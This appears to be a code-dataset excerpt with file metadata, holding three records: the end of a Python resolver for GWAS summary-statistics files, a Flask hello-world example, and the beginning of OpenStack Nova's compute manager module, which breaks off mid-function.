elif gt(CHR_ORDER[chr_snps], CHR_ORDER[chr_gwas]):
if not is_valid_rsID(fields):
fields[cols_i['rsID']] = '.'
break # after this a new line of GWAS SS should be read and index incremented
except Exception as e:
if isinstance(e, IndexError) or isinstance(e, EOFError):
# it reached the end of an either file
pass
else:
# print(f'An error occured on line {SNPs_FILE_line_i} of the SNPs file (see below)')
print(f'An error occured while looping through the SNPs file (see below)')
raise e
def resolve_ChrBP(fields, SNPs_rsID_FILE_o):
"""
Loops through the SNPs file entries until it finds the current locus
Current locus is defined by rsID from the passed `fields`, which is one row of GWAS SS
Assumes given GWAS SS file is sorted by rsID, in the same way this processed SNPs file is.
`SNPs_rsID_FILE_o`
opened SNPs file object
"""
if is_valid_rsID(fields) and not all([
is_valid_Chr(fields), is_valid_BP(fields),
is_valid_OA(fields), is_valid_EA(fields),
is_valid_EAF(fields),
]):
try:
rsID_gwas = fields[cols_i['rsID']]
while True:
chr_snps, bp_snps, rsid, ref, alt, freq = read_dbSNP2_data_row(SNPs_rsID_FILE_o)
# SNPs_FILE_line_i += 1
if rsid < rsID_gwas:
continue
elif rsID_gwas == rsid:
fields[cols_i['Chr']] = chr_snps
fields[cols_i['BP']] = bp_snps
resolve_allele(fields, ref, alt)
resolve_EAF(fields, ref, alt, freq)
break # after this a new line of GWAS SS should be read and index incremented
else: #rsid > bp_gwas:
if not is_valid_Chr(fields) or not is_valid_BP(fields):
fields[cols_i['Chr']] = '.'
fields[cols_i['BP']] = '.'
break # after this a new line of GWAS SS should be read and index incremented
except Exception as e:
if isinstance(e, IndexError) or isinstance(e, EOFError):
# it reached the end of an either file
pass
else:
# print(f'An error occured on line {SNPs_FILE_line_i} of the SNPs file (see below)')
print(f'An error occured while looping through the SNPs file (see below)')
raise e
def resolve_SE(fields):
if not is_valid_SE(fields) and is_valid_beta(fields) and is_valid_pval(fields):
fields[cols_i["SE"]] = str(get_StdErr_from_beta_pval(
float(fields[cols_i["beta"]]), float(fields[cols_i["pval"]])
))
def resolve_beta(fields):
if not is_valid_beta(fields) and is_valid_SE(fields) and is_valid_pval(fields):
fields[cols_i["beta"]] = str(get_beta_from_StdErr_pval(
float(fields[cols_i["SE"]]), float(fields[cols_i["pval"]])
))
def resolve_pval(fields):
if not is_valid_pval(fields) and is_valid_beta(fields) and is_valid_SE(fields):
fields[cols_i["pval"]] = str(get_pval_from_beta_StdErr(
float(fields[cols_i["beta"]]), float(fields[cols_i["SE"]])
))
##### FULL RESOLVER #####
"""
This function will be called for each row of the input GWAS SS file
It calls resolvers one by one from the list of resolvers.
Each resolver attempts to resolve one or many values for the given row.
Each resolver has `fields: list[str]` as the first argument,
and may have other args defined as a list under the corresponding index in `resolvers_args` list
"""
resolvers = [] # list of functions
resolvers_args = [] # list of lists of arguments for these functions
def run_all(resolvers, fields, args):
for res_i in range(len(resolvers)):
resolvers[res_i](fields, *args[res_i])
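# Editor's sketch of the pairing convention (illustrative only; the real lists are filled in below):
#   resolvers      = [resolve_rsID,   resolve_SE]
#   resolvers_args = [[SNPs_FILE_o],  []        ]
#   run_all(resolvers, fields, resolvers_args)
# i.e. resolvers[i](fields, *resolvers_args[i]) is called for each i, mutating `fields` in place.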
# # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# MAIN #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # #
MAIN_start_time = STEP1_start_time = time.time()
#
# STEP #1
# Assemble the full resolver function in accordance with the issues that are present.
#
# E.g.:
# - if all values from a particular column are valid,
# there's no need to add a resolver function for it.
# - if all values from a particular column are invalid,
# there's no need to add a resolver for another column that depends on the first,
# as it would always run uselessly
#
#
issues, total_entries = read_report_from_dir(REPORT_DIR)
DOING_LIFTOVER: bool = False
current_build = get_build()
converter = None
if current_build != 'hg38' and file_exists(CHAIN_FILE):
DOING_LIFTOVER = True
if DOING_LIFTOVER:
converter = get_lifter_from_ChainFile(CHAIN_FILE, current_build, 'hg38')
set_build('hg38')
resolvers.append(resolve_build38)
resolvers_args.append([converter])
if not DOING_LIFTOVER and GWAS_SORTING == 'rsID' and (issues['Chr'] or issues['BP'] or issues['OA'] or issues['EA'] or issues['EAF']) and file_exists(SNPs_rsID_FILE):
"""
This ChrBP resolver assumes GWAS SS file is sorted by rsID
"""
# open files here
SNPs_rsID_FILE_o_gz: io.RawIOBase = gzip.open(SNPs_rsID_FILE, 'r') # type: ignore # GzipFile and RawIOBase _are_ in fact compatible
SNPs_rsID_FILE_o = io.TextIOWrapper(io.BufferedReader(SNPs_rsID_FILE_o_gz))
resolvers.append(resolve_ChrBP)
resolvers_args.append([SNPs_rsID_FILE_o])
if not DOING_LIFTOVER and GWAS_SORTING == 'ChrBP' and (issues['rsID'] or issues['OA'] or issues['EA'] or issues['EAF']) and file_exists(SNPs_FILE):
"""
These resolvers assume the GWAS SS file is sorted by Chr and BP in accordance with the SNPs file
"""
SNPs_FILE_o_gz: io.RawIOBase = gzip.open(SNPs_FILE, 'r') # type: ignore # GzipFile and RawIOBase _are_ in fact compatible
SNPs_FILE_o = io.TextIOWrapper(io.BufferedReader(SNPs_FILE_o_gz))
resolvers.append(resolve_rsID)
resolvers_args.append([SNPs_FILE_o])
if issues['SE'] and issues['beta']<total_entries and issues['pval']<total_entries:
resolvers.append(resolve_SE)
resolvers_args.append([])
if issues['beta'] and issues['SE']<total_entries and issues['pval']<total_entries:
resolvers.append(resolve_beta)
resolvers_args.append([])
if issues['pval'] and issues['beta']<total_entries and issues['SE']<total_entries:
resolvers.append(resolve_pval)
resolvers_args.append([])
#
# STEP #2
# Loop through the GWAS SS file,
# For each row, run all assembled resolvers, and FINALLY save the row to the output file
#
# copy the first line that is the header
line_i = copy_line(line_i)
try:
while True:
fields = get_next_line_in_GWASSS()
run_all(resolvers, fields, resolvers_args)
write_line_to_GWASSS(fields)
except Exception as e:
if isinstance(e, IndexError) or isinstance(e, EOFError):
# it reached the end of the file
pass
else:
print(f'An error occured on line {line_i} of the GWAS SS file (see below)')
raise e
GWAS_FILE_o.close()
OUTPUT_GWAS_FILE_o.close()
| 32.17976 | 166 | 0.59304 |
4a1e3b0ee813805b2a38a496f99da1499f3f0f4b | 205 | py | Python | projects/01_hello_world/01_hello_world.py | NJannasch/TechLabs-FlaskIntro | 24fadedd42ba2bfddbc40b0f939a47dfcf85867f | ["MIT"] | null | null | null | projects/01_hello_world/01_hello_world.py | NJannasch/TechLabs-FlaskIntro | 24fadedd42ba2bfddbc40b0f939a47dfcf85867f | ["MIT"] | null | null | null | projects/01_hello_world/01_hello_world.py | NJannasch/TechLabs-FlaskIntro | 24fadedd42ba2bfddbc40b0f939a47dfcf85867f | ["MIT"] | null | null | null |
from flask import Flask, jsonify
app = Flask(__name__)
@app.route('/', methods=['GET'])
def home():
    return "Hello World"
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080, debug=True)
| 20.5 | 50 | 0.64878 |
4a1e3b40091fbe8dcd64af3b667eddb979f993b2 | 393,419 | py | Python | nova/compute/manager.py | mariusleu/nova | b19e37cbfddfce0839dbeeb0d556ed1ffae664ad | ["Apache-2.0"] | null | null | null | nova/compute/manager.py | mariusleu/nova | b19e37cbfddfce0839dbeeb0d556ed1ffae664ad | ["Apache-2.0"] | null | null | null | nova/compute/manager.py | mariusleu/nova | b19e37cbfddfce0839dbeeb0d556ed1ffae664ad | ["Apache-2.0"] | null | null | null |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all processes relating to instances (guest vms).
The :py:class:`ComputeManager` class is a :py:class:`nova.manager.Manager` that
handles RPC calls relating to creating instances. It is responsible for
building a disk image, launching it via the underlying virtualization driver,
responding to calls to check its state, attaching persistent storage, and
terminating it.
"""
import base64
import binascii
import contextlib
import functools
import inspect
import random
import sys
import time
import traceback
from cinderclient import exceptions as cinder_exception
from cursive import exception as cursive_exception
import eventlet.event
from eventlet import greenthread
import eventlet.semaphore
import eventlet.timeout
from keystoneauth1 import exceptions as keystone_exception
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from oslo_service import loopingcall
from oslo_service import periodic_task
from oslo_utils import excutils
from oslo_utils import strutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
from six.moves import range
from nova import block_device
from nova.cells import rpcapi as cells_rpcapi
from nova import compute
from nova.compute import build_results
from nova.compute import claims
from nova.compute import power_state
from nova.compute import resource_tracker
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute.utils import wrap_instance_event
from nova.compute import vm_states
from nova import conductor
import nova.conf
from nova.console import rpcapi as console_rpcapi
import nova.context
from nova import exception
from nova import exception_wrapper
from nova import hooks
from nova.i18n import _
from nova import image
from nova import manager
from nova import network
from nova.network import base_api as base_net_api
from nova.network import model as network_model
from nova.network.security_group import openstack_driver
from nova import objects
from nova.objects import base as obj_base
from nova.objects import fields
from nova.objects import instance as obj_instance
from nova.objects import migrate_data as migrate_data_obj
from nova.pci import whitelist
from nova import rpc
from nova import safe_utils
from nova.scheduler import client as scheduler_client
from nova.scheduler import utils as scheduler_utils
from nova import utils
from nova.virt import block_device as driver_block_device
from nova.virt import configdrive
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import storage_users
from nova.virt import virtapi
from nova.volume import cinder
CONF = nova.conf.CONF
LOG = logging.getLogger(__name__)
get_notifier = functools.partial(rpc.get_notifier, service='compute')
wrap_exception = functools.partial(exception_wrapper.wrap_exception,
get_notifier=get_notifier,
binary='nova-compute')
@contextlib.contextmanager
def errors_out_migration_ctxt(migration):
"""Context manager to error out migration on failure."""
try:
yield
except Exception:
with excutils.save_and_reraise_exception():
if migration:
# We may have been passed None for our migration if we're
# receiving from an older client. The migration will be
# errored via the legacy path.
migration.status = 'error'
try:
with migration.obj_as_admin():
migration.save()
except Exception:
LOG.debug(
'Error setting migration status for instance %s.',
migration.instance_uuid, exc_info=True)
@utils.expects_func_args('migration')
def errors_out_migration(function):
"""Decorator to error out migration on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
wrapped_func = safe_utils.get_wrapped_function(function)
keyed_args = inspect.getcallargs(wrapped_func, self, context,
*args, **kwargs)
migration = keyed_args['migration']
with errors_out_migration_ctxt(migration):
return function(self, context, *args, **kwargs)
return decorated_function
@utils.expects_func_args('instance')
def reverts_task_state(function):
"""Decorator to revert task_state on failure."""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.UnexpectedTaskStateError as e:
# Note(maoy): unexpected task state means the current
# task is preempted. Do not clear task state in this
# case.
with excutils.save_and_reraise_exception():
LOG.info("Task possibly preempted: %s",
e.format_message())
except Exception:
with excutils.save_and_reraise_exception():
wrapped_func = safe_utils.get_wrapped_function(function)
keyed_args = inspect.getcallargs(wrapped_func, self, context,
*args, **kwargs)
# NOTE(mriedem): 'instance' must be in keyed_args because we
# have utils.expects_func_args('instance') decorating this
# method.
instance = keyed_args['instance']
original_task_state = instance.task_state
try:
self._instance_update(context, instance, task_state=None)
LOG.info("Successfully reverted task state from %s on "
"failure for instance.",
original_task_state, instance=instance)
except exception.InstanceNotFound:
# We might delete an instance that failed to build shortly
# after it errored out. This is an expected case and we
# should not trace on it.
pass
except Exception as e:
LOG.warning("Failed to revert task state for instance. "
"Error: %s", e, instance=instance)
return decorated_function
@utils.expects_func_args('instance')
def wrap_instance_fault(function):
"""Wraps a method to catch exceptions related to instances.
This decorator wraps a method to catch any exceptions having to do with
an instance that may get thrown. It then logs an instance fault in the db.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
try:
return function(self, context, *args, **kwargs)
except exception.InstanceNotFound:
raise
except Exception as e:
# NOTE(gtt): If argument 'instance' is in args rather than kwargs,
# we will get a KeyError exception which will cover up the real
# exception. So, we update kwargs with the values from args first.
# Then, we can get 'instance' from kwargs easily.
kwargs.update(dict(zip(function.__code__.co_varnames[2:], args)))
with excutils.save_and_reraise_exception():
compute_utils.add_instance_fault_from_exc(context,
kwargs['instance'], e, sys.exc_info())
return decorated_function
@utils.expects_func_args('image_id', 'instance')
def delete_image_on_error(function):
"""Used for snapshot related method to ensure the image created in
compute.api is deleted when an error occurs.
"""
@functools.wraps(function)
def decorated_function(self, context, image_id, instance,
*args, **kwargs):
try:
return function(self, context, image_id, instance,
*args, **kwargs)
except Exception:
with excutils.save_and_reraise_exception():
LOG.debug("Cleaning up image %s", image_id,
exc_info=True, instance=instance)
try:
self.image_api.delete(context, image_id)
except exception.ImageNotFound:
                    # Since we're trying to clean up an image, we don't care
                    # if it's already gone.
pass
except Exception:
LOG.exception("Error while trying to clean up image %s",
image_id, instance=instance)
return decorated_function
# TODO(danms): Remove me after Icehouse
# TODO(alaski): Actually remove this after Newton, assuming a major RPC bump
# NOTE(mikal): if the method being decorated has more than one decorator, then
# put this one first. Otherwise the various exception handling decorators do
# not function correctly.
def object_compat(function):
"""Wraps a method that expects a new-world instance
This provides compatibility for callers passing old-style dict
instances.
"""
@functools.wraps(function)
def decorated_function(self, context, *args, **kwargs):
def _load_instance(instance_or_dict):
if isinstance(instance_or_dict, dict):
# try to get metadata and system_metadata for most cases but
# only attempt to load those if the db instance already has
# those fields joined
metas = [meta for meta in ('metadata', 'system_metadata')
if meta in instance_or_dict]
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance_or_dict,
expected_attrs=metas)
instance._context = context
return instance
return instance_or_dict
try:
kwargs['instance'] = _load_instance(kwargs['instance'])
except KeyError:
args = (_load_instance(args[0]),) + args[1:]
migration = kwargs.get('migration')
if isinstance(migration, dict):
migration = objects.Migration._from_db_object(
context.elevated(), objects.Migration(),
migration)
kwargs['migration'] = migration
return function(self, context, *args, **kwargs)
return decorated_function
class InstanceEvents(object):
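    """Track external events that in-flight instance operations wait on.

    Events are stored per instance uuid and keyed by (name, tag) as
    eventlet.event.Event objects, which waiters block on until the event
    is popped and signalled, or cancelled at shutdown.
    """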
def __init__(self):
self._events = {}
@staticmethod
def _lock_name(instance):
return '%s-%s' % (instance.uuid, 'events')
def prepare_for_instance_event(self, instance, name, tag):
"""Prepare to receive an event for an instance.
This will register an event for the given instance that we will
wait on later. This should be called before initiating whatever
action will trigger the event. The resulting eventlet.event.Event
object should be wait()'d on to ensure completion.
:param instance: the instance for which the event will be generated
:param name: the name of the event we're expecting
:param tag: the tag associated with the event we're expecting
:returns: an event object that should be wait()'d on
"""
if self._events is None:
# NOTE(danms): We really should have a more specific error
# here, but this is what we use for our default error case
raise exception.NovaException('In shutdown, no new events '
'can be scheduled')
@utils.synchronized(self._lock_name(instance))
def _create_or_get_event():
instance_events = self._events.setdefault(instance.uuid, {})
return instance_events.setdefault((name, tag),
eventlet.event.Event())
LOG.debug('Preparing to wait for external event %(name)s-%(tag)s',
{'name': name, 'tag': tag}, instance=instance)
return _create_or_get_event()
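    # A minimal sketch of the intended call pattern (the event name and the
    # helper below are illustrative placeholders, not callers in this module):
    #
    #     event = instance_events.prepare_for_instance_event(
    #         instance, 'network-vif-plugged', vif_id)
    #     start_action_that_emits_the_event()
    #     event.wait()  # released once the external-event handler pops and
    #                   # sends the corresponding event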
def pop_instance_event(self, instance, event):
"""Remove a pending event from the wait list.
This will remove a pending event from the wait list so that it
can be used to signal the waiters to wake up.
:param instance: the instance for which the event was generated
:param event: the nova.objects.external_event.InstanceExternalEvent
that describes the event
:returns: the eventlet.event.Event object on which the waiters
are blocked
"""
no_events_sentinel = object()
no_matching_event_sentinel = object()
@utils.synchronized(self._lock_name(instance))
def _pop_event():
if self._events is None:
LOG.debug('Unexpected attempt to pop events during shutdown',
instance=instance)
return no_events_sentinel
events = self._events.get(instance.uuid)
if not events:
return no_events_sentinel
_event = events.pop((event.name, event.tag), None)
if not events:
del self._events[instance.uuid]
if _event is None:
return no_matching_event_sentinel
return _event
result = _pop_event()
if result is no_events_sentinel:
LOG.debug('No waiting events found dispatching %(event)s',
{'event': event.key},
instance=instance)
return None
elif result is no_matching_event_sentinel:
LOG.debug('No event matching %(event)s in %(events)s',
{'event': event.key,
'events': self._events.get(instance.uuid, {}).keys()},
instance=instance)
return None
else:
return result
def clear_events_for_instance(self, instance):
"""Remove all pending events for an instance.
This will remove all events currently pending for an instance
and return them (indexed by event name).
:param instance: the instance for which events should be purged
:returns: a dictionary of {event_name: eventlet.event.Event}
"""
@utils.synchronized(self._lock_name(instance))
def _clear_events():
if self._events is None:
LOG.debug('Unexpected attempt to clear events during shutdown',
instance=instance)
return dict()
# NOTE(danms): We have historically returned the raw internal
            # format here, which is {event.key: [events, ...]} so just
# trivially convert it here.
return {'%s-%s' % k: e
for k, e in self._events.pop(instance.uuid, {}).items()}
return _clear_events()
def cancel_all_events(self):
if self._events is None:
LOG.debug('Unexpected attempt to cancel events during shutdown.')
return
our_events = self._events
# NOTE(danms): Block new events
self._events = None
for instance_uuid, events in our_events.items():
for (name, tag), eventlet_event in events.items():
LOG.debug('Canceling in-flight event %(name)s-%(tag)s for '
'instance %(instance_uuid)s',
{'name': name,
'tag': tag,
'instance_uuid': instance_uuid})
event = objects.InstanceExternalEvent(
instance_uuid=instance_uuid,
name=name, status='failed',
tag=tag, data={})
eventlet_event.send(event)
class ComputeVirtAPI(virtapi.VirtAPI):
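    """virtapi.VirtAPI implementation backed by the compute manager.

    It gives the virt driver a narrow handle back into the compute manager,
    primarily for waiting on external instance events.
    """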
def __init__(self, compute):
super(ComputeVirtAPI, self).__init__()
self._compute = compute
def _default_error_callback(self, event_name, instance):
raise exception.NovaException(_('Instance event failed'))
@contextlib.contextmanager
def wait_for_instance_event(self, instance, event_names, deadline=300,
error_callback=None):
"""Plan to wait for some events, run some code, then wait.
This context manager will first create plans to wait for the
provided event_names, yield, and then wait for all the scheduled
events to complete.
Note that this uses an eventlet.timeout.Timeout to bound the
operation, so callers should be prepared to catch that
failure and handle that situation appropriately.
If the event is not received by the specified timeout deadline,
eventlet.timeout.Timeout is raised.
If the event is received but did not have a 'completed'
status, a NovaException is raised. If an error_callback is
provided, instead of raising an exception as detailed above
for the failure case, the callback will be called with the
event_name and instance, and can return True to continue
waiting for the rest of the events, False to stop processing,
or raise an exception which will bubble up to the waiter.
:param instance: The instance for which an event is expected
:param event_names: A list of event names. Each element is a
tuple of strings to indicate (name, tag),
where name is required, but tag may be None.
:param deadline: Maximum number of seconds we should wait for all
of the specified events to arrive.
:param error_callback: A function to be called if an event arrives
"""
if error_callback is None:
error_callback = self._default_error_callback
events = {}
for event_name in event_names:
name, tag = event_name
event_name = objects.InstanceExternalEvent.make_key(name, tag)
try:
events[event_name] = (
self._compute.instance_events.prepare_for_instance_event(
instance, name, tag))
except exception.NovaException:
error_callback(event_name, instance)
# NOTE(danms): Don't wait for any of the events. They
# should all be canceled and fired immediately below,
# but don't stick around if not.
deadline = 0
yield
with eventlet.timeout.Timeout(deadline):
for event_name, event in events.items():
actual_event = event.wait()
if actual_event.status == 'completed':
continue
decision = error_callback(event_name, instance)
if decision is False:
break
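# Example of the context-manager API above (a sketch; `virtapi`, the event
# name and `plug_the_vif` are placeholders, not names from this module):
#
#     with virtapi.wait_for_instance_event(
#             instance, [('network-vif-plugged', vif_id)], deadline=300):
#         plug_the_vif()  # the action expected to emit the event
#     # exiting the block waits for the event; eventlet.timeout.Timeout is
#     # raised if the deadline passes first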
class ComputeManager(manager.Manager):
"""Manages the running instances from creation to destruction."""
target = messaging.Target(version='5.0')
# How long to wait in seconds before re-issuing a shutdown
# signal to an instance during power off. The overall
# time to wait is set by CONF.shutdown_timeout.
SHUTDOWN_RETRY_INTERVAL = 10
def __init__(self, compute_driver=None, *args, **kwargs):
"""Load configuration options and connect to the hypervisor."""
self.virtapi = ComputeVirtAPI(self)
self.network_api = network.API()
self.volume_api = cinder.API()
self.image_api = image.API()
self._last_host_check = 0
self._last_bw_usage_poll = 0
self._bw_usage_supported = True
self._last_bw_usage_cell_update = 0
self.compute_api = compute.API()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self.conductor_api = conductor.API()
self.compute_task_api = conductor.ComputeTaskAPI()
self.is_neutron_security_groups = (
openstack_driver.is_neutron_security_groups())
self.cells_rpcapi = cells_rpcapi.CellsAPI()
self.scheduler_client = scheduler_client.SchedulerClient()
self.reportclient = self.scheduler_client.reportclient
self._resource_tracker = None
self.instance_events = InstanceEvents()
self._sync_power_pool = eventlet.GreenPool(
size=CONF.sync_power_state_pool_size)
self.instance_running_pool = utils.PoolProxy(eventlet.GreenPool(
size=CONF.instance_running_pool_size))
self._syncs_in_progress = {}
self.send_instance_updates = (
CONF.filter_scheduler.track_instance_changes)
if CONF.max_concurrent_builds > 0:
self._build_semaphore = eventlet.semaphore.Semaphore(
CONF.max_concurrent_builds)
else:
self._build_semaphore = compute_utils.UnlimitedSemaphore()
if CONF.max_concurrent_builds_per_project > 0:
self._per_project_build_semaphore = nova.utils.Semaphores(
semaphore_default=lambda: eventlet.semaphore.Semaphore(
CONF.max_concurrent_builds_per_project))
else:
self._per_project_build_semaphore = nova.utils.Semaphores(
compute_utils.UnlimitedSemaphore)
if CONF.max_concurrent_live_migrations > 0:
self._live_migration_semaphore = eventlet.semaphore.Semaphore(
CONF.max_concurrent_live_migrations)
else:
self._live_migration_semaphore = compute_utils.UnlimitedSemaphore()
super(ComputeManager, self).__init__(service_name="compute",
*args, **kwargs)
self.additional_endpoints.append(_ComputeV4Proxy(self))
# NOTE(russellb) Load the driver last. It may call back into the
# compute manager via the virtapi, so we want it to be fully
# initialized before that happens.
self.driver = driver.load_compute_driver(self.virtapi, compute_driver)
self.use_legacy_block_device_info = \
self.driver.need_legacy_block_device_info
def reset(self):
LOG.info('Reloading compute RPC API')
compute_rpcapi.LAST_VERSION = None
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
def _get_resource_tracker(self):
if not self._resource_tracker:
rt = resource_tracker.ResourceTracker(self.host, self.driver)
self._resource_tracker = rt
return self._resource_tracker
def _update_resource_tracker(self, context, instance):
"""Let the resource tracker know that an instance has changed state."""
if instance.host == self.host:
rt = self._get_resource_tracker()
rt.update_usage(context, instance, instance.node)
def _instance_update(self, context, instance, **kwargs):
"""Update an instance in the database using kwargs as value."""
for k, v in kwargs.items():
setattr(instance, k, v)
instance.save()
self._update_resource_tracker(context, instance)
def _nil_out_instance_obj_host_and_node(self, instance):
# NOTE(jwcroppe): We don't do instance.save() here for performance
# reasons; a call to this is expected to be immediately followed by
# another call that does instance.save(), thus avoiding two writes
# to the database layer.
instance.host = None
instance.node = None
def _set_instance_obj_error_state(self, context, instance,
clean_task_state=False):
try:
instance.vm_state = vm_states.ERROR
if clean_task_state:
instance.task_state = None
instance.save()
except exception.InstanceNotFound:
LOG.debug('Instance has been destroyed from under us while '
'trying to set it to ERROR', instance=instance)
def _get_instances_on_driver(self, context, filters=None):
"""Return a list of instance records for the instances found
on the hypervisor which satisfy the specified filters. If filters=None
return a list of instance records for all the instances found on the
hypervisor.
"""
if not filters:
filters = {}
try:
driver_uuids = self.driver.list_instance_uuids()
if len(driver_uuids) == 0:
# Short circuit, don't waste a DB call
return objects.InstanceList()
filters['uuid'] = driver_uuids
local_instances = objects.InstanceList.get_by_filters(
context, filters, use_slave=True)
return local_instances
except NotImplementedError:
pass
# The driver doesn't support uuids listing, so we'll have
# to brute force.
driver_instances = self.driver.list_instances()
# NOTE(mjozefcz): In this case we need to apply host filter.
# Without this all instance data would be fetched from db.
filters['host'] = self.host
instances = objects.InstanceList.get_by_filters(context, filters,
use_slave=True)
name_map = {instance.name: instance for instance in instances}
local_instances = []
for driver_instance in driver_instances:
instance = name_map.get(driver_instance)
if not instance:
continue
local_instances.append(instance)
return local_instances
def _destroy_evacuated_instances(self, context):
"""Destroys evacuated instances.
While nova-compute was down, the instances running on it could be
evacuated to another host. This method looks for evacuation migration
records where this is the source host and which were either started
(accepted) or complete (done). From those migration records, local
instances reported by the hypervisor are compared to the instances
for the migration records and those local guests are destroyed, along
with instance allocation records in Placement for this node.
"""
filters = {
'source_compute': self.host,
# NOTE(mriedem): Migration records that have been accepted are
# included in case the source node comes back up while instances
# are being evacuated to another host. We don't want the same
# instance being reported from multiple hosts.
'status': ['accepted', 'done'],
'migration_type': 'evacuation',
}
with utils.temporary_mutation(context, read_deleted='yes'):
evacuations = objects.MigrationList.get_by_filters(context,
filters)
if not evacuations:
return
evacuations = {mig.instance_uuid: mig for mig in evacuations}
local_instances = self._get_instances_on_driver(context)
evacuated = [inst for inst in local_instances
if inst.uuid in evacuations]
# NOTE(gibi): We are called from init_host and at this point the
# compute_nodes of the resource tracker has not been populated yet so
# we cannot rely on the resource tracker here.
compute_nodes = {}
for instance in evacuated:
migration = evacuations[instance.uuid]
LOG.info('Deleting instance as it has been evacuated from '
'this host', instance=instance)
try:
network_info = self.network_api.get_instance_nw_info(
context, instance)
bdi = self._get_instance_block_device_info(context,
instance)
destroy_disks = not (self._is_instance_storage_shared(
context, instance))
except exception.InstanceNotFound:
network_info = network_model.NetworkInfo()
bdi = {}
LOG.info('Instance has been marked deleted already, '
'removing it from the hypervisor.',
instance=instance)
# always destroy disks if the instance was deleted
destroy_disks = True
self.driver.destroy(context, instance,
network_info,
bdi, destroy_disks)
# delete the allocation of the evacuated instance from this host
if migration.source_node not in compute_nodes:
try:
cn_uuid = objects.ComputeNode.get_by_host_and_nodename(
context, self.host, migration.source_node).uuid
compute_nodes[migration.source_node] = cn_uuid
except exception.ComputeHostNotFound:
LOG.error("Failed to clean allocation of evacuated "
"instance as the source node %s is not found",
migration.source_node, instance=instance)
continue
cn_uuid = compute_nodes[migration.source_node]
if not scheduler_utils.remove_allocation_from_compute(
context, instance, cn_uuid, self.reportclient):
LOG.error("Failed to clean allocation of evacuated instance "
"on the source node %s",
cn_uuid, instance=instance)
migration.status = 'completed'
migration.save()
def _is_instance_storage_shared(self, context, instance, host=None):
shared_storage = True
data = None
try:
data = self.driver.check_instance_shared_storage_local(context,
instance)
if data:
shared_storage = (self.compute_rpcapi.
check_instance_shared_storage(context,
instance, data, host=host))
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'instance shared storage check, '
'assuming it\'s not on shared storage',
instance=instance)
shared_storage = False
except Exception:
LOG.exception('Failed to check if instance shared',
instance=instance)
finally:
if data:
self.driver.check_instance_shared_storage_cleanup(context,
data)
return shared_storage
def _complete_partial_deletion(self, context, instance):
"""Complete deletion for instances in DELETED status but not marked as
deleted in the DB
"""
system_meta = instance.system_metadata
instance.destroy()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._complete_deletion(context,
instance,
bdms,
system_meta)
def _complete_deletion(self, context, instance, bdms,
system_meta):
self._update_resource_tracker(context, instance)
rt = self._get_resource_tracker()
rt.reportclient.delete_allocation_for_instance(context, instance.uuid)
self._notify_about_instance_usage(context, instance, "delete.end",
system_metadata=system_meta)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.DELETE,
phase=fields.NotificationPhase.END, bdms=bdms)
self._delete_scheduler_instance_info(context, instance.uuid)
def _init_instance(self, context, instance):
"""Initialize this instance during service init."""
# NOTE(danms): If the instance appears to not be owned by this
# host, it may have been evacuated away, but skipped by the
# evacuation cleanup code due to configuration. Thus, if that
# is a possibility, don't touch the instance in any way, but
# log the concern. This will help avoid potential issues on
# startup due to misconfiguration.
if instance.host != self.host:
LOG.warning('Instance %(uuid)s appears to not be owned '
'by this host, but by %(host)s. Startup '
'processing is being skipped.',
{'uuid': instance.uuid,
'host': instance.host})
return
# Instances that are shut down, or in an error state can not be
# initialized and are not attempted to be recovered. The exception
# to this are instances that are in RESIZE_MIGRATING or DELETING,
# which are dealt with further down.
if (instance.vm_state == vm_states.SOFT_DELETED or
(instance.vm_state == vm_states.ERROR and
instance.task_state not in
(task_states.RESIZE_MIGRATING, task_states.DELETING))):
LOG.debug("Instance is in %s state.",
instance.vm_state, instance=instance)
return
if instance.vm_state == vm_states.DELETED:
try:
self._complete_partial_deletion(context, instance)
except Exception:
                # we don't want an exception to block the init_host
LOG.exception('Failed to complete a deletion',
instance=instance)
return
if (instance.vm_state == vm_states.BUILDING or
instance.task_state in [task_states.SCHEDULING,
task_states.BLOCK_DEVICE_MAPPING,
task_states.NETWORKING,
task_states.SPAWNING]):
# NOTE(dave-mcnally) compute stopped before instance was fully
# spawned so set to ERROR state. This is safe to do as the state
            # may be set by the api but the host is not, so if we get here the
# instance has already been scheduled to this particular host.
LOG.debug("Instance failed to spawn correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state in [vm_states.ACTIVE, vm_states.STOPPED] and
instance.task_state in [task_states.REBUILDING,
task_states.REBUILD_BLOCK_DEVICE_MAPPING,
task_states.REBUILD_SPAWNING]):
# NOTE(jichenjc) compute stopped before instance was fully
            # spawned, so set to ERROR state. This is consistent with the
            # BUILDING case above.
LOG.debug("Instance failed to rebuild correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.IMAGE_SNAPSHOT_PENDING,
task_states.IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING,
task_states.IMAGE_SNAPSHOT]):
